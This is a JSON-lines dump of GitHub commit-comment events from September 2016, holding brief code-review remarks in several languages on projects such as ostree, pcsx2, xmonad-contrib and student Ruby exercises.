{"id":"4504345423","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"di8905/ttd"},"payload":{"comment":{"id":18868551,"position":5,"line":5,"path":"app/models/train.rb","commit_id":"b1489d0875ef342a0fa6e38856fbfff0f6c7dac6","created_at":"2016-09-01T18:37:33Z","updated_at":"2016-09-01T18:37:33Z","body":"как поезд может иметь несколько маршрутов?"}},"created_at":"2016-09-01T18:37:33Z"}
{"id":"4504346019","type":"CommitCommentEvent","actor":{"login":"scottbrassfield"},"repo":{"name":"scottbrassfield/online-shopping"},"payload":{"comment":{"id":18868554,"position":null,"line":null,"path":null,"commit_id":"91da0a6a19803b6b33f936d1022326ec572319de","created_at":"2016-09-01T18:37:40Z","updated_at":"2016-09-01T18:37:40Z","body":"- User can now remove items in cart\r\n\r\n- General code organization "}},"created_at":"2016-09-01T18:37:40Z"}
{"id":"4504347416","type":"CommitCommentEvent","actor":{"login":"arichiardi"},"repo":{"name":"degree9/boot-semver"},"payload":{"comment":{"id":18868560,"position":67,"line":142,"path":"src/degree9/boot_semver.clj","commit_id":"f371f5740d29aaeabae9de21b3d20c028e24662d","created_at":"2016-09-01T18:37:57Z","updated_at":"2016-09-01T18:37:57Z","body":"just as a note, this `comp` might be unnecessary as `(new/new)` already returns a function that accepts a fileset"}},"created_at":"2016-09-01T18:37:57Z"}
{"id":"4504347661","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18868562,"position":172,"line":2381,"path":"src/libostree/ostree-repo-commit.c","commit_id":"c33e8d48260397fb3c6e08f6e6afe2294cec50a1","created_at":"2016-09-01T18:38:00Z","updated_at":"2016-09-01T18:38:00Z","body":"Same here -- the `G_IO_ERROR_NOT_FOUND` error special case has been removed."}},"created_at":"2016-09-01T18:38:00Z"}
{"id":"4504348890","type":"CommitCommentEvent","actor":{"login":"andela-kndungu"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18868565,"position":null,"line":null,"path":null,"commit_id":"722411644b05c9628c8c6c62c5730d5334a09232","created_at":"2016-09-01T18:38:14Z","updated_at":"2016-09-01T18:38:14Z","body":"Good catch."}},"created_at":"2016-09-01T18:38:14Z"}
{"id":"4504351407","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18868571,"position":null,"line":null,"path":null,"commit_id":"d78d515acb04a3bfbf0f1dca125fbb2756cbbe9d","created_at":"2016-09-01T18:38:42Z","updated_at":"2016-09-01T18:38:42Z","body":"Ok thanks for the screenshot. I think, I need to add others tabs. I implemented the opcode, but it likely need tables for constant propagations. Maybe we can dirty everything. I need to look."}},"created_at":"2016-09-01T18:38:42Z"}
{"id":"4504352504","type":"CommitCommentEvent","actor":{"login":"andela-kndungu"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18868575,"position":18,"line":11,"path":"server/controllers/helpers/authorise.js","commit_id":"edcb742fb684633fff9acd29a836e1b54883cecc","created_at":"2016-09-01T18:38:55Z","updated_at":"2016-09-01T18:38:55Z","body":"The power of ES2015 :)"}},"created_at":"2016-09-01T18:38:55Z"}
{"id":"4504354354","type":"CommitCommentEvent","actor":{"login":"vlad3996"},"repo":{"name":"vlad3996/hello-world"},"payload":{"comment":{"id":18868580,"position":null,"line":null,"path":null,"commit_id":"b39caaaef741f0df98111ce4a9b43d144c639eb8","created_at":"2016-09-01T18:39:17Z","updated_at":"2016-09-01T18:39:17Z","body":"my comment\r\n"}},"created_at":"2016-09-01T18:39:17Z"}
{"id":"4504359768","type":"CommitCommentEvent","actor":{"login":"kamarush"},"repo":{"name":"DarkKat-Rom/android_device_lge_hammerhead"},"payload":{"comment":{"id":18868593,"position":5,"line":12,"path":"sepolicy/mediaserver.te","commit_id":"c6a57f2c766d4136d204c7491410f49c0912ab05","created_at":"2016-09-01T18:40:17Z","updated_at":"2016-09-01T18:40:17Z","body":"This should be cameraserver system_file:file execmod; but atm it's unneeded\r\n\r\nand for permissive just only need to revert this:\r\nhttps://android-review.googlesource.com/#/c/175223/\r\nand comment out execmod.\r\nfor enforcing need only system/sepolicy \"hack\" and this cameraserver rule and should be fine all."}},"created_at":"2016-09-01T18:40:17Z"}
{"id":"4504360306","type":"CommitCommentEvent","actor":{"login":"UlfNorell"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":18868594,"position":18,"line":212,"path":"src/full/Agda/TypeChecking/Reduce/Fast.hs","commit_id":"aee0e9c9aaef56fc2c3ed018fd80b0f014dba43f","created_at":"2016-09-01T18:40:21Z","updated_at":"2016-09-01T18:40:21Z","body":"Oh, oops. That's left over from some debugging. "}},"created_at":"2016-09-01T18:40:21Z"}
{"id":"4504366483","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18868612,"position":null,"line":null,"path":null,"commit_id":"d78d515acb04a3bfbf0f1dca125fbb2756cbbe9d","created_at":"2016-09-01T18:41:27Z","updated_at":"2016-09-01T18:41:27Z","body":"@ramapcsx2 where can I find which register read/written by the opcode ?  A manual of the opcode will be nice."}},"created_at":"2016-09-01T18:41:27Z"}
{"id":"4504369117","type":"CommitCommentEvent","actor":{"login":"andela-kndungu"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18868617,"position":5,"line":38,"path":"app/components/home/UserHome/body/AddDocument/AddDocumentForm.jsx","commit_id":"9714b0dc4adfb47b711d28d14862d947b544f3e3","created_at":"2016-09-01T18:41:56Z","updated_at":"2016-09-01T18:41:56Z","body":"This was a pain point.\r\n\r\nIf I do that they would be displayed in lower case but the database queries would still have to be made in **whatever case**. That will just have to serve as the fix."}},"created_at":"2016-09-01T18:41:56Z"}
{"id":"4504369611","type":"CommitCommentEvent","actor":{"login":"gogoengie"},"repo":{"name":"gogoengie/bcolz"},"payload":{"comment":{"id":18868621,"position":null,"line":null,"path":null,"commit_id":"853856a9f383ff461118579ed110099c2ac5e76d","created_at":"2016-09-01T18:42:02Z","updated_at":"2016-09-01T18:42:02Z","body":"Ref: https://github.com/Blosc/bcolz/issues/316\r\n\r\nOpen a ctable with only a subset of the available columns. Not well tested, example only."}},"created_at":"2016-09-01T18:42:02Z"}
{"id":"4504371728","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"snazzarov/lesson7"},"payload":{"comment":{"id":18868626,"position":4,"line":4,"path":"cargotrain.rb","commit_id":"21562f5952eaf8d4589ca34f1effdf5fd2f06df0","created_at":"2016-09-01T18:42:25Z","updated_at":"2016-09-01T18:42:25Z","body":"не надо ставить пробел после скобки и перед идентификатором."}},"created_at":"2016-09-01T18:42:25Z"}
{"id":"4504373883","type":"CommitCommentEvent","actor":{"login":"fuzegit"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":18868633,"position":null,"line":null,"path":null,"commit_id":"74bae5305c1c4554f1a469515fac956cd11a1ee3","created_at":"2016-09-01T18:42:50Z","updated_at":"2016-09-01T18:42:50Z","body":"Там её аналог для конкретного применения и если искомый ключ является массивом, как это есть в гридах, то она уже не работает.\r\nВ общем поправил так https://github.com/instantsoft/icms2/commit/f80ad42e91e465b95e52996254cd73203f8bb4e3"}},"created_at":"2016-09-01T18:42:50Z"}
{"id":"4504375554","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18868636,"position":null,"line":null,"path":null,"commit_id":"7029b16a109eed118b2f8e62f860502f2e7ea8c6","created_at":"2016-09-01T18:43:09Z","updated_at":"2016-09-01T18:43:09Z","body":"Can you squash this with previous?"}},"created_at":"2016-09-01T18:43:09Z"}
{"id":"4504375723","type":"CommitCommentEvent","actor":{"login":"adleong"},"repo":{"name":"monzo/linkerd"},"payload":{"comment":{"id":18868637,"position":null,"line":null,"path":null,"commit_id":"39dd9c538c300bfce6060653b8d73838de891e85","created_at":"2016-09-01T18:43:11Z","updated_at":"2016-09-01T18:43:11Z","body":"This is not as crufty as you think, I think it's pretty close to a \"correct\" solution.  With this code, does linkerd ever reconnect to the k8s api after encountering the error?  By my reading, `reader.read` would just continue to return exceptions and this would become an infinite `AsyncStream` of `None`s.\r\n\r\nMy thought would be in the case of an exception, we should just return the `AsyncStream` we have so far instead of calling `chunks(tail)`.  That way we return a finite `AsyncStream` and the reconnection logic that is appended to it will be reachable."}},"created_at":"2016-09-01T18:43:11Z"}
{"id":"4504378037","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"snazzarov/lesson7"},"payload":{"comment":{"id":18868644,"position":12,"line":12,"path":"cargowagon.rb","commit_id":"21562f5952eaf8d4589ca34f1effdf5fd2f06df0","created_at":"2016-09-01T18:43:34Z","updated_at":"2016-09-01T18:43:34Z","body":"Не совсем к месту тут вопросительный знак. Метод с вопросительным знаком должен возвращать true/false, а у тебя возрващает занятый объем. Поэтому это атрибут и знак вопроса тут надо убрать."}},"created_at":"2016-09-01T18:43:34Z"}
{"id":"4504380340","type":"CommitCommentEvent","actor":{"login":"paveljanik"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":18868649,"position":null,"line":null,"path":null,"commit_id":"1faa8c7cf5149b4bb5e35144baaa809e4dbee513","created_at":"2016-09-01T18:43:58Z","updated_at":"2016-09-01T18:43:58Z","body":"I'd prefer the other way: first `i`, then `j` inside. But this is minor nit."}},"created_at":"2016-09-01T18:43:58Z"}
{"id":"4504380376","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18868650,"position":null,"line":null,"path":null,"commit_id":"5840cba21d437cbe76e7dcd5d0e732cc2f0115cc","created_at":"2016-09-01T18:43:59Z","updated_at":"2016-09-01T18:43:59Z","body":"Can you squash the compat file test commits into a single one, in general? Unless you have a specific reason to keep it separate."}},"created_at":"2016-09-01T18:43:59Z"}
{"id":"4504382984","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"snazzarov/lesson7"},"payload":{"comment":{"id":18868659,"position":16,"line":16,"path":"cargowagon.rb","commit_id":"21562f5952eaf8d4589ca34f1effdf5fd2f06df0","created_at":"2016-09-01T18:44:27Z","updated_at":"2016-09-01T18:44:27Z","body":"И здесь знак вопроса лишний. В руби насчет таких методов четкое соглашение - знаком вопроса заканчиваются методы-предикаты, возрващающие  true/false. Поэтому не стоит его использовать в других случаях."}},"created_at":"2016-09-01T18:44:27Z"}
{"id":"4504383857","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-admin-ui"},"payload":{"comment":{"id":18868661,"position":36,"line":12,"path":"app/views/kaui/admin_tenants/_show_overdue_simple.erb","commit_id":"051a5a9051236d48e119e4ab41b18beb82df930b","created_at":"2016-09-01T18:44:36Z","updated_at":"2016-09-01T18:44:36Z","body":"Makes sense, will move it there."}},"created_at":"2016-09-01T18:44:36Z"}
{"id":"4504385220","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"snazzarov/lesson7"},"payload":{"comment":{"id":18868663,"position":12,"line":12,"path":"passengerwagon.rb","commit_id":"21562f5952eaf8d4589ca34f1effdf5fd2f06df0","created_at":"2016-09-01T18:44:48Z","updated_at":"2016-09-01T18:44:48Z","body":"Убери знак вопроса"}},"created_at":"2016-09-01T18:44:48Z"}
{"id":"4504385558","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"snazzarov/lesson7"},"payload":{"comment":{"id":18868664,"position":16,"line":16,"path":"passengerwagon.rb","commit_id":"21562f5952eaf8d4589ca34f1effdf5fd2f06df0","created_at":"2016-09-01T18:44:51Z","updated_at":"2016-09-01T18:44:51Z","body":"Убери знак вопроса"}},"created_at":"2016-09-01T18:44:51Z"}
{"id":"4504385656","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18868665,"position":20,"line":4560,"path":"src/libostree/ostree-repo.c","commit_id":"9fc090f9da86b35356ac2673827aa1d9341d870d","created_at":"2016-09-01T18:44:52Z","updated_at":"2016-09-01T18:44:52Z","body":"Should be not `NULL` here at this point"}},"created_at":"2016-09-01T18:44:52Z"}
{"id":"4504388525","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"snazzarov/lesson7"},"payload":{"comment":{"id":18868676,"position":65,"line":65,"path":"station.rb","commit_id":"21562f5952eaf8d4589ca34f1effdf5fd2f06df0","created_at":"2016-09-01T18:45:24Z","updated_at":"2016-09-01T18:45:24Z","body":"Используй each для итерации по коллекции"}},"created_at":"2016-09-01T18:45:24Z"}
{"id":"4504390828","type":"CommitCommentEvent","actor":{"login":"dkulp"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":18868679,"position":null,"line":null,"path":null,"commit_id":"ffce86a84508ee7ae38010af7cfcc2aef076ec85","created_at":"2016-09-01T18:45:48Z","updated_at":"2016-09-01T18:45:48Z","body":"I think I just pushed a fix, can you check?"}},"created_at":"2016-09-01T18:45:48Z"}
{"id":"4504391838","type":"CommitCommentEvent","actor":{"login":"kesienaAkp"},"repo":{"name":"andela-kndungu/document-ms-frontend"},"payload":{"comment":{"id":18868683,"position":5,"line":38,"path":"app/components/home/UserHome/body/AddDocument/AddDocumentForm.jsx","commit_id":"9714b0dc4adfb47b711d28d14862d947b544f3e3","created_at":"2016-09-01T18:46:00Z","updated_at":"2016-09-01T18:46:00Z","body":"So you can have a hybrid solution of both, insertion queries use lower case tags and the autocomplete display is also capitalized with css :smile: "}},"created_at":"2016-09-01T18:46:00Z"}
{"id":"4504392709","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"snazzarov/lesson7"},"payload":{"comment":{"id":18868685,"position":158,"line":158,"path":"train.rb","commit_id":"21562f5952eaf8d4589ca34f1effdf5fd2f06df0","created_at":"2016-09-01T18:46:11Z","updated_at":"2016-09-01T18:46:11Z","body":"А здесь используй each_with_index"}},"created_at":"2016-09-01T18:46:11Z"}
{"id":"4504394136","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18868689,"position":12,"line":55,"path":"include/vrv/system.h","commit_id":"aefb21790da4cf94a970946738a82061df8857da","created_at":"2016-09-01T18:46:24Z","updated_at":"2016-09-01T18:46:24Z","body":"Yes,  I will have to fix that when I merge the development branch again."}},"created_at":"2016-09-01T18:46:24Z"}
{"id":"4504395176","type":"CommitCommentEvent","actor":{"login":"mchandschuh"},"repo":{"name":"QuantConnect/Lean"},"payload":{"comment":{"id":18868694,"position":7,"line":92,"path":"Launcher/Program.cs","commit_id":"ce449fde03566962fc8975d4e7e21d29e8cf3c8e","created_at":"2016-09-01T18:46:35Z","updated_at":"2016-09-01T18:46:35Z","body":"@jaredbroad -  is that process helper in common? "}},"created_at":"2016-09-01T18:46:35Z"}
{"id":"4504395769","type":"CommitCommentEvent","actor":{"login":"gregory38"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18868697,"position":null,"line":null,"path":null,"commit_id":"d78d515acb04a3bfbf0f1dca125fbb2756cbbe9d","created_at":"2016-09-01T18:46:42Z","updated_at":"2016-09-01T18:46:42Z","body":"Hum, I think there is another issue. The function that will do the constant propagation is this one `rpsxpropBSC`. The assertion is the opcode 18. Ok I put the COP2 in the wrong place. I will fix it, I still need to update the constant propagation table. \r\n"}},"created_at":"2016-09-01T18:46:42Z"}
{"id":"4504400478","type":"CommitCommentEvent","actor":{"login":"Der-Eddy"},"repo":{"name":"Der-Eddy/discord_bot"},"payload":{"comment":{"id":18868713,"position":null,"line":null,"path":null,"commit_id":"b1a77618ba2384e747b1470ce82c91fda6e5dfad","created_at":"2016-09-01T18:47:33Z","updated_at":"2016-09-01T18:47:33Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;orxRV8Md&#x2F;24-allow-mod-admin-commands-per-server-permissions-not-the-name\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Allow Mod&#x2F;Admin commands per server permissions, not the name</a>"}},"created_at":"2016-09-01T18:47:33Z"}
{"id":"4504403690","type":"CommitCommentEvent","actor":{"login":"AzGilrock"},"repo":{"name":"smeighan/xLights"},"payload":{"comment":{"id":18868721,"position":null,"line":null,"path":null,"commit_id":"ffce86a84508ee7ae38010af7cfcc2aef076ec85","created_at":"2016-09-01T18:48:11Z","updated_at":"2016-09-01T18:48:11Z","body":"I can check but will be in about 5 hours."}},"created_at":"2016-09-01T18:48:11Z"}
{"id":"4504404979","type":"CommitCommentEvent","actor":{"login":"jbblanchet"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18868722,"position":null,"line":null,"path":null,"commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T18:48:25Z","updated_at":"2016-09-01T18:48:25Z","body":"@lucas-mancini \r\nIt's stable and usable, I'd go with 1.0.0, even on a first release."}},"created_at":"2016-09-01T18:48:25Z"}
{"id":"4504406884","type":"CommitCommentEvent","actor":{"login":"f1u77y"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18868729,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T18:48:45Z","updated_at":"2016-09-01T18:48:45Z","body":"Got it.\r\nBut i still have some related questions:\r\n1) We do refresh the cache on some events because we should avoid querying tree from X. But we have to do it at the startup. So, is `docksStartupHook` required or can we avoid it?\r\n2) (not so related) That discussion was caused by messages that were not sent to inactive layout. Wouldn't it be better to have some messages that are sent only to active sub-layout and others are sent to all sub-layouts? That would also make separate `ReleaseResourses`(and maybe some other messages) handling not required."}},"created_at":"2016-09-01T18:48:45Z"}
{"id":"4504408669","type":"CommitCommentEvent","actor":{"login":"reimertz"},"repo":{"name":"jmhobbs/cultofthepartyparrot.com"},"payload":{"comment":{"id":18868734,"position":null,"line":null,"path":null,"commit_id":"9d70b8dd5d46d8434f2e1cdde4da4316688d2277","created_at":"2016-09-01T18:49:05Z","updated_at":"2016-09-01T18:49:05Z","body":"SAY WHAAAT! <3 <3 <3"}},"created_at":"2016-09-01T18:49:05Z"}
{"id":"4504411757","type":"CommitCommentEvent","actor":{"login":"nouiz"},"repo":{"name":"Theano/Theano"},"payload":{"comment":{"id":18868745,"position":5,"line":40,"path":"theano/gpuarray/tests/tstgpueye.c","commit_id":"5c9ad24e319831432bea2ee798b70a10011f7b0e","created_at":"2016-09-01T18:49:38Z","updated_at":"2016-09-01T18:49:38Z","body":"Could this interface be moved to libgpuarray with function with variable number of arguments? (not mandatory, but i think it would be good)."}},"created_at":"2016-09-01T18:49:38Z"}
{"id":"4504413294","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/Learn_ror"},"payload":{"comment":{"id":18868749,"position":13,"line":13,"path":"Lesson9/accessor.rb","commit_id":"cb11c0025233c1ef4147f3e07a65e0969208b309","created_at":"2016-09-01T18:49:55Z","updated_at":"2016-09-01T18:49:55Z","body":"А ведь в первый раз тут не будет значения, и << не сработает. А значит, значения вообще не будут сохраняться"}},"created_at":"2016-09-01T18:49:55Z"}
{"id":"4504416359","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18868759,"position":122,"line":535,"path":"src/libostree/ostree-repo-commit.c","commit_id":"04b844b3c0d10e8b988fa20c2c2b3fb48909aebe","created_at":"2016-09-01T18:50:30Z","updated_at":"2016-09-01T18:50:30Z","body":"Nitpicking, but while you're at it, can you fix the indentation here and use C-style comments instead of C++?"}},"created_at":"2016-09-01T18:50:30Z"}
{"id":"4504416412","type":"CommitCommentEvent","actor":{"login":"cheesegrits"},"repo":{"name":"Fabrik/fabrik"},"payload":{"comment":{"id":18868760,"position":null,"line":null,"path":null,"commit_id":"45a373791261e0797a87f89a8355ced55625265b","created_at":"2016-09-01T18:50:31Z","updated_at":"2016-09-01T18:50:31Z","body":"Note that these will get lost in the next build when we pull from transifex"}},"created_at":"2016-09-01T18:50:31Z"}
{"id":"4504422505","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18868774,"position":127,"line":127,"path":"src/ostree/ot-builtin-size-summary.c","commit_id":"b56a22b545e881595829f0fbc10a4c79ec08dad2","created_at":"2016-09-01T18:51:40Z","updated_at":"2016-09-01T18:51:40Z","body":"Looks like this is always non `NULL`"}},"created_at":"2016-09-01T18:51:40Z"}
{"id":"4504426098","type":"CommitCommentEvent","actor":{"login":"cheesegrits"},"repo":{"name":"Fabrik/fabrik"},"payload":{"comment":{"id":18868786,"position":null,"line":null,"path":null,"commit_id":"45a373791261e0797a87f89a8355ced55625265b","created_at":"2016-09-01T18:52:20Z","updated_at":"2016-09-01T18:52:20Z","body":"(Only en-GB translations get pushed from github to transifex when committed, so they don't get overwritten.  All other translations get pulled in during a build, and overwrite whatever is in github)"}},"created_at":"2016-09-01T18:52:20Z"}
{"id":"4504426139","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/Learn_ror"},"payload":{"comment":{"id":18868787,"position":9,"line":10,"path":"Lesson9/validation.rb","commit_id":"44c77e1fce8559ce089a8016a71391caf0c2ca85","created_at":"2016-09-01T18:52:20Z","updated_at":"2016-09-01T18:52:20Z","body":"Что-то сложный какой-то ключ получается. Сделай ключом имя атрибута, а значением - массив из типа валидатора и параметров (массив массивов или массив хешей)."}},"created_at":"2016-09-01T18:52:20Z"}
{"id":"4504427000","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18868793,"position":84,"line":84,"path":"src/ostree/ot-builtin-size-summary.c","commit_id":"b56a22b545e881595829f0fbc10a4c79ec08dad2","created_at":"2016-09-01T18:52:30Z","updated_at":"2016-09-01T18:52:30Z","body":"Nitpick: can you change these to C-style comments?"}},"created_at":"2016-09-01T18:52:30Z"}
{"id":"4504429186","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/Learn_ror"},"payload":{"comment":{"id":18868800,"position":14,"line":15,"path":"Lesson9/validation.rb","commit_id":"44c77e1fce8559ce089a8016a71391caf0c2ca85","created_at":"2016-09-01T18:52:54Z","updated_at":"2016-09-01T18:52:54Z","body":"Лучше это сделать в методе included"}},"created_at":"2016-09-01T18:52:54Z"}
{"id":"4504431210","type":"CommitCommentEvent","actor":{"login":"geekosaur"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18868811,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T18:53:16Z","updated_at":"2016-09-01T18:53:16Z","body":"`docksStartupHook` will always be required at startup; some windows may already exist, especially if we are doing `xmonad --replace`.\r\n\r\n`broadcastMessage` sends to all layouts, not just the active one (which is `sendMessage`). I thought I explained this the first time around."}},"created_at":"2016-09-01T18:53:16Z"}
{"id":"4504432354","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/Learn_ror"},"payload":{"comment":{"id":18868816,"position":15,"line":16,"path":"Lesson9/validation.rb","commit_id":"44c77e1fce8559ce089a8016a71391caf0c2ca85","created_at":"2016-09-01T18:53:29Z","updated_at":"2016-09-01T18:53:29Z","body":"Т.е. модуль InstanceMethods на этом закончился? А все остальные уже не в нем? Не очень хорошо"}},"created_at":"2016-09-01T18:53:29Z"}
{"id":"4504433066","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18868818,"position":null,"line":null,"path":null,"commit_id":"77b5f2a318b14a381aaeac4d00adfaee1ce4d5ad","created_at":"2016-09-01T18:53:36Z","updated_at":"2016-09-01T18:53:36Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://54.234.50.226:8080/ui#review:id=62)"}},"created_at":"2016-09-01T18:53:36Z"}
{"id":"4504436536","type":"CommitCommentEvent","actor":{"login":"sectioneight"},"repo":{"name":"sectioneight/dotfiles"},"payload":{"comment":{"id":18868826,"position":null,"line":null,"path":null,"commit_id":"72a5be8a937563ce318197918d9996cd3c1d9221","created_at":"2016-09-01T18:54:17Z","updated_at":"2016-09-01T18:54:17Z","body":"https://github.com/sectioneight/dotfiles/commit/2d006427265e3e3cd923fa3b5e91db1c235502d8"}},"created_at":"2016-09-01T18:54:17Z"}
{"id":"4504437139","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"Perkir/Learn_ror"},"payload":{"comment":{"id":18868828,"position":19,"line":20,"path":"Lesson9/validation.rb","commit_id":"44c77e1fce8559ce089a8016a71391caf0c2ca85","created_at":"2016-09-01T18:54:23Z","updated_at":"2016-09-01T18:54:23Z","body":"validation - это же ключ. А у тебя ключ  - это массив  из имени атрибута и типа валидатора. Вряд ли так будет работать"}},"created_at":"2016-09-01T18:54:23Z"}
{"id":"4504438383","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":18868833,"position":null,"line":null,"path":null,"commit_id":"fc780596504df7d1e7d16412532a50c2f7854517","created_at":"2016-09-01T18:54:37Z","updated_at":"2016-09-01T18:54:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;PAU3V30B&#x2F;298-gestion-du-make-version-en-utilisant-les-fonctionnalites-de-npm-version\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Gestion du &quot;make version&quot; en utilisant les fonctionnalités de &quot;npm version&quot;</a>"}},"created_at":"2016-09-01T18:54:37Z"}
{"id":"4504440311","type":"CommitCommentEvent","actor":{"login":"reimertz"},"repo":{"name":"johanbrook/johanbrook.com"},"payload":{"comment":{"id":18868844,"position":null,"line":null,"path":null,"commit_id":"2822b524a9e9db17d4261f54223bc2e9e115aff3","created_at":"2016-09-01T18:54:59Z","updated_at":"2016-09-01T18:54:59Z","body":"lol, no script. scriptkiddie!"}},"created_at":"2016-09-01T18:54:59Z"}
{"id":"4504441717","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"ezpaarse-project/ezpaarse"},"payload":{"comment":{"id":18868847,"position":5,"line":110,"path":"Makefile","commit_id":"fed23ae1cee903a18641ba0ed57079ee49bb25ae","created_at":"2016-09-01T18:55:15Z","updated_at":"2016-09-01T18:55:15Z","body":"Merci @nojhamster j'ai patché ezmaster pour utiliser cette fonctionnalité de npm version\r\nhttps://github.com/Inist-CNRS/ezmaster/commit/fc780596504df7d1e7d16412532a50c2f7854517"}},"created_at":"2016-09-01T18:55:15Z"}
{"id":"4504444693","type":"CommitCommentEvent","actor":{"login":"iliyaMar"},"repo":{"name":"iliyaMar/iliya-test-rep"},"payload":{"comment":{"id":18868854,"position":null,"line":null,"path":null,"commit_id":"1e8885e51896e2214f34d87964b81c499fd626e7","created_at":"2016-09-01T18:55:46Z","updated_at":"2016-09-01T18:55:46Z","body":"bla bla bla"}},"created_at":"2016-09-01T18:55:46Z"}
{"id":"4504446002","type":"CommitCommentEvent","actor":{"login":"lencioni"},"repo":{"name":"sectioneight/dotfiles"},"payload":{"comment":{"id":18868857,"position":null,"line":null,"path":null,"commit_id":"2d006427265e3e3cd923fa3b5e91db1c235502d8","created_at":"2016-09-01T18:56:00Z","updated_at":"2016-09-01T18:56:00Z","body":"👍 I didn't mention this in the comment but this shows you authors in reverse chronological order by most recent commit. You can re-order by most frequent by piping to sort."}},"created_at":"2016-09-01T18:56:00Z"}
{"id":"4504446120","type":"CommitCommentEvent","actor":{"login":"liskin"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18868859,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T18:56:01Z","updated_at":"2016-09-01T18:56:01Z","body":"No, docksStartupHook won't be required and shouldn't be. Just make the extensible state a Maybe. Then, in modifyLayoutWithUpdate, if it's Nothing, query X, if it's Just empty, don't.\r\n\r\nDoes broadcastMessage really send a message to both sides of |||?"}},"created_at":"2016-09-01T18:56:01Z"}
{"id":"4504448644","type":"CommitCommentEvent","actor":{"login":"knrafto"},"repo":{"name":"Cal-CS-61A-Staff/ok"},"payload":{"comment":{"id":18868870,"position":5,"line":255,"path":"server/models.py","commit_id":"a544efb9d73eb32c686b23f87d3190951b881a2c","created_at":"2016-09-01T18:56:29Z","updated_at":"2016-09-01T18:56:29Z","body":"You can use Course.query.get(cid) instead"}},"created_at":"2016-09-01T18:56:29Z"}
{"id":"4504449255","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":18868871,"position":37,"line":191,"path":"src/etc/inc/openvpn.inc","commit_id":"74e8e203b12c42da84382075d38402f3e0b1e0ec","created_at":"2016-09-01T18:56:36Z","updated_at":"2016-09-01T18:56:36Z","body":"Nice! I'd suggest ksort() in the other function as well, it makes sense to not trust OpenVPN there ever again ;)"}},"created_at":"2016-09-01T18:56:36Z"}
